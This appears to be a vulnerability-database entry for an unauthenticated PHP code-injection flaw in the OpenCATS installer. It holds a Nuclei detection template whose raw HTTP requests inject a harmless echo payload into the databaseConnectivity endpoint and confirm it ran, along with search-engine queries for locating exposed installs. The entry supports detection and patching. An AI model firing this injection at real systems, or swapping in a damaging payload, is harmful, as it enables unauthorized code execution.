/Vulnerability Library

OpenCATS - Command Injection

CVE-2026-27760
Verified

Description

OpenCATS prior to commit 3002a29 contains a command injection caused by injection of PHP statements into the installer AJAX endpoint's databaseConnectivity action parameter, letting unauthenticated attackers execute arbitrary code, exploit requires incomplete installation wizard.

Severity

High

CVSS Score

8.1

Exploit Probability

22%

Affected Product

opencats

Published Date

June 17, 2026

Template Author

theamanrawat

CVE-2026-27760.yaml
id: CVE-2026-27760

info:
  name: OpenCATS - Command Injection
  author: theamanrawat
  severity: high
  description: |
    OpenCATS prior to commit 3002a29 contains a command injection caused by injection of PHP statements into the installer AJAX endpoint's databaseConnectivity action parameter, letting unauthenticated attackers execute arbitrary code, exploit requires incomplete installation wizard.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP code remotely, leading to full system compromise.
  remediation: |
    Update to the version after commit 3002a29 or latest available version.
  reference:
    - https://chocapikk.com/posts/2026/opencats-installer-rce/
    - https://github.com/opencats/OpenCATS/commit/3002a29f4c3cada1aa2c4f3d4ae4e189906606b6
    - https://github.com/opencats/OpenCATS
    - https://nvd.nist.gov/vuln/detail/CVE-2026-27760
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2026-27760
    epss-score: 0.22189
    epss-percentile: 0.97386
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 3
    vendor: opencats
    product: opencats
    shodan-query:
      - title:"opencats"
      - http.title:"opencats"
    fofa-query: title="opencats"
    google-query: intitle:"opencats"
  tags: cve,cve2026,opencats,rce,vkev

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /ajax.php?f=install:ui&a=databaseConnectivity HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "!contains(body, 'installLocked')"
          - "contains(body, 'setActiveStep')"
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        POST /ajax.php?f=install:ui&a=databaseConnectivity HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user=cats');echo+'{{randstr}}'.md5('{{randstr}}');//

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
        internal: true

  - raw:
      - |
        GET /index.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(body, '{{randstr}}' + md5('{{randstr}}'))"
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100dce60ee6b1f689a7f1206278fad2c9c43e78038a8fffa770f7682dc80ac9ab2c0221009406f897158f0c439dd010cb41cc2b991e2863b0247f5850a4ecf5e31130bd51:922c64590222798bb761d5b6d8e72950
8.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-27760
CWE ID:
cwe-94

References

https://chocapikk.com/posts/2026/opencats-installer-rce/https://github.com/opencats/OpenCATS/commit/3002a29f4c3cada1aa2c4f3d4ae4e189906606b6https://github.com/opencats/OpenCATShttps://nvd.nist.gov/vuln/detail/CVE-2026-27760

Remediation Steps

Update to the version after commit 3002a29 or latest available version.